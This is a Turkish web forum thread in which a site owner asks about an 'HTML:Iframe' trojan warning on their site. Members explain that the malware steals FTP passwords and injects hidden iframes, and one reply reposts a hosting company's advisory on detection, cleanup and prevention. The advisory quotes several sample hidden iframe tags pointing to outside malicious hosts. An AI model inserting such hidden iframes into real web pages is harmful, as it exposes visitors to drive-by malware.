HTML:Illiframe-C [Trj] Sorunu ?

[cmbmlu]

Abılerım DW yapmıs oldugum sıtede HTML:Illiframe-C [Trj] Sorununla karşılaştım. Bılgısayarımda sıteyı yaparken hıc vırus uyarı vermıyor ama sıteyı acarken bu trajan uyarını alıyorum sdece benım bılgısayarımda degıl sıteyı nerden acmak ıstesem oyle oluyor nasıl halledebılırım bılen varmı ?

 

[emnimax]

sitede kodlarını acc ıcınde ılgınc bır ıframe kodu olacaktır bunu sıl butun html dosyalarından ama o zaman sorunun hallolur kolay gelsın.

 

[cmbmlu]

DW programı actım zaten onla yapmıstım ve dedıgın gıbı baska baska sıte ısımlerı wardı onları sıldım pekı bunlar yenıden oluşma ıhtımalını varmı nasıl onleyebılırım :s

 

[skys]

DW programı actım zaten onla yapmıstım ve dedıgın gıbı baska baska sıte ısımlerı wardı onları sıldım pekı bunlar yenıden oluşma ıhtımalını varmı nasıl onleyebılırım :s

Sanırım cuteftp Programı ile bulaşıyordu.. Bir yerlerde öyle okumuştum ama hatırlamıyorum.

 

[emnimax]

cracklı FTP programları cracklı tasarım programları gıbı turevlerden kacın hostun da herseyı kullanma yanı bılmedıgın olarak onlemlerını anlman yeterlı.

 

[kaberdey]

cracksiz de bulaşıyor
ben filezilla kullanıyorum aynı sorun bende de var, bu bilgisayarına yerleşen ve ftp şifrenle iş yapan bir virüs. Sayfanın kodlarına iframe ekliyor ve hostuna yüklüyor.

şimdilik çözümünü bilmiyor ve antivirüsçülerin çözüm üretmesini bekliyorum ben de

 

[yetkilibiri]

cracksiz de bulaşıyor
ben filezilla kullanıyorum aynı sorun bende de var, bu bilgisayarına yerleşen ve ftp şifrenle iş yapan bir virüs. Sayfanın kodlarına iframe ekliyor ve hostuna yüklüyor.

şimdilik çözümünü bilmiyor ve antivirüsçülerin çözüm üretmesini bekliyorum ben de

Aynen katılıyorum. Benim Amerikada çok kaliteli bir şirketten aldığım hostum vardı.
Güvenlik derecesi çok iyiymiş HACKER SAFE teknolojisi varmış saydılar da saydılar alırken...

Ulan FTP de bir bulaştı trojen. ne kadar dosya varsa (html-php-asp-txt) hepsine kenini ekliyor.

En son index.SWF yapmıştım onu değiştiremedi :devil2:

Ama adamların SERVER dan temizlemesi 3 gün sürdü.

 

[cmbmlu]

Abilerim kod olarak sıldım ama attıgımde bı sure sonra bu trajon yne devreye gırıyor :s

 

[kaberdey]

ben de 2 kez yeniledim siteleri aynı hale geldiler
beklemedeyim. yedeğin varsa korkma atarsın geri ama çözüm için hala beklemedeyiz....

Bir siteden bulduğum açıklama ve korunma yolları

İFRAME VİRÜSÜ VE BU VİRÜSTEN KORUNMA YOLLARI

Iframe virüsü hakkında.
Saygıdeğer birhost network müşterileri ' son zamanlarda müşterilerimizin sıkça karşılaştığı virüs olan Iframe-32 virüsü ve çalışma mantığı hakkında bilgi vermeye çalışacağız.
İframe virüsü nedir ?
iFrame olarak tanımlanan bu virüs, bilgisayarınıza bulaştığında ftp bağlantı şifrelerinizi (keylogger) ele geçirip daha sonra herhangi bir zaman diliminde FTP yolu ile sitenize bağlanıp genellikle (index.html, index.php, default.html, default.php vs) gibi dosyalara zararlı kod enjekte eden ve eklediği dosyaları genelde çalışmaz hale getiren yada google tarafından zararlı içerik barındıran site olarak işaretlenmesini sağlayan bir virüs türüdür.
örnek kodlar (değişkenlik gösterebilir) genellikle sayfanın en altında yer alır ;
iframe src="http://xxxxxx.com" width=1 height=1 style="visibility:hidden;position:absolute"></iframe
iframe src="http://x6p.ini/ndex.php" width=168 height=156 style="visibility: hidden"></iframe
iframe src="http://a5g.ru/ts/in.cgi" width=125 height=125 style="visibility: hidden"></iframe
iframe src="http://q41.ru/index.php" width=110 height=190 style="visibility: hidden"></iframe
antivirüs programlarınca bilinen çeşitli isimleri varıdr
Trojan.JS.Gumblar-8
HTML.Iframe-32
Exploit.HTML.IFrame-6
HTML.Iframe-32
İframe Virüsü Nasıl bulaşır ?
İframe virüsü internetteki kaynaklardan araştırmamıza göre aşağıdaki nedenlerle bilgisayarınıza bulaşmış olabilir. (fakat bunlarla sınırlı değildir)
1. Crackli ftp programı kullanımı
2. İçeriğinde zararlı kod barındıran sitelere girme ( ActiveX uygulamalarını tarayıcı vasıtasıyla bilgisayarınıza bilerek yada bilmeyerek yükleme)
3. Yazılım yüklemeleri, yalancı ücretsiz antivirüs yada spyware yazılımları , crackli yada keygen içeren full yazılımlar.
4. Bilgisayardan bilgisayara dolaşan usb belleklerle . hafıza kartı vs.
5. Ağ ortamında iseniz başka bilgisayarda çalışan uygulamalar üzerinden bulaşabilir.

Siteme iframe virüsü tarafından zararlı kod eklendiğini nasıl tespit edebilirim ?
Genellikle sitenize girdiğinizde antivirüs programları uyarı verir, sitenizde anormal derecede yavaşlama hissedilir, yada sayfalarınız açılmıyor ise (genellikle boş sayfa) , yada google tarafından zararlı içerik barındıran sayfa olarak işaretlendiyse.
Bu belirtiler sitenizdeki dosyalara iframe virüsünün bulaştığının bir göstergesidir.
Bu virüsü nasıl temizlerim ?
Virüsü temizlediğinize emin olmadan bilgisayarınızla ftp bağlantısı yapmayın.
1. Öncelikli olarak bilgisayarınızı güvenilir bir güncel antivirüs programıyla taratın. bilinen virüs programlarının güncel 30 günlük deneme sürümlerinide kullanabilirsiniz.

2. Eğer virüsü kaldırdığınızdan emin değil yada şüpheleriniz varsa bilgisayarınıza format atıp tekrar kurulumunu yapın. (format atmak gözünüzde büyümesin) Format attıktan sonra yedek kurduğunuz uygulamaları tekrar dikkatlice gözden geçirin , crack, keygen, yada null edilmiş (kaynak kodları değiştirilmiş) uygulamaları kullanmayın bilgisayarınıza kurmayın.

3. Kontrol panel den sitenizin tüm bağlantı şifrelerini değiştirin. (not : eğer virüs kesin olarak temizlenmediyse şifrenizi değiştirseniz bile tekrar ftp den bağlantı kurduğunuzda virüs yeni şifrenizi ele geçirecek ve tekrar aktif olacaktır.)

4. Sitenizdeki sayfalara bulaşan iframe kodlarını kaldırın , yada elinizde yedek var ise o yedekleri yükleyin .not : yedeklerinizin enjekte edilmiş kod olmadığından emin olun.

5. yedek yüklemesini bizden ücretsiz olarak talep edebilirsiniz. birhost sunucularında 1 haftaya kadar günlük yedekler alınır. fakat sunucu tarafından alınan yedeklerinizde iframe kodu olabilir.
Birdaha bu durumları yaşamamam için neler yapmam gerek ?
1. Öncelikle sitenizin şifresini periyodik aralıklarla değiştiriniz. ftp programlarına şifrenizi kayıt etmeyin.
2. Düzenli aralıklarla yedek alınız. yedekleme işlemi bu durum dışında olası bir problem yada sorunda veri kaybını önemli derecede azaltacaktır. nasıl yedek alınacağı konusunda bizimle irtibata geçebilirsiniz.
3. Güvendiğiniz sitelerden download yapın . şüphelediğiniz yada güven vermeyen sitelerden hiç birşekilde uygulama indirmeyiniz (örnek ücretsiz yazılım, online yada ücretsiz antivirüs, spyware, ücretsiz oyun vs içerikli siteler vs.)
4. İnternet ortamı her nekadar insanlık için büyük faydalar sağlıyorsada aynı zamanda tersi bir durumda söz konusudur. o yüzden internet üzerinden yapacağınız her türlü işlemi uygulamadan önce dikkatli şekilde işlemlerinizi yapmaya gayret gösterin.

kaynak

 

[cmbmlu]

cuteftp dan yapıyorum bırde baska bır program la denıcem bakalım.

 

[Abdurahman]

kolay kolay kurtulamazsın ! iframe virüsü bu.. ilk önce ftp deki tüm sayfalarını yedekle.. sonra FTP yi sil komple.. ardından yedeklerin içersindeki <iframe> kodlarını kaldırmalısın.. bu kodlar genellik FTP yazılımlarından bulaşıyor... Önerim FTP Programı Kullanma Direk ftp://site.(com,net,org herneyse vs..) giriş yap öyle kullan

 

[kaberdey]

cuteftp dan yapıyorum bırde baska bır program la denıcem bakalım.

bunun programla ilgisi yok maalesef, belki direk browserdan ftp:// ile bağlanarak deneyebilirsin, ama önerim şudur, başka bir bilgisayardan dosyalarını upload et ve önceki kullandığın bilgisayarla FTP'ye bağlanma yoksa yine aynı yere dönersin...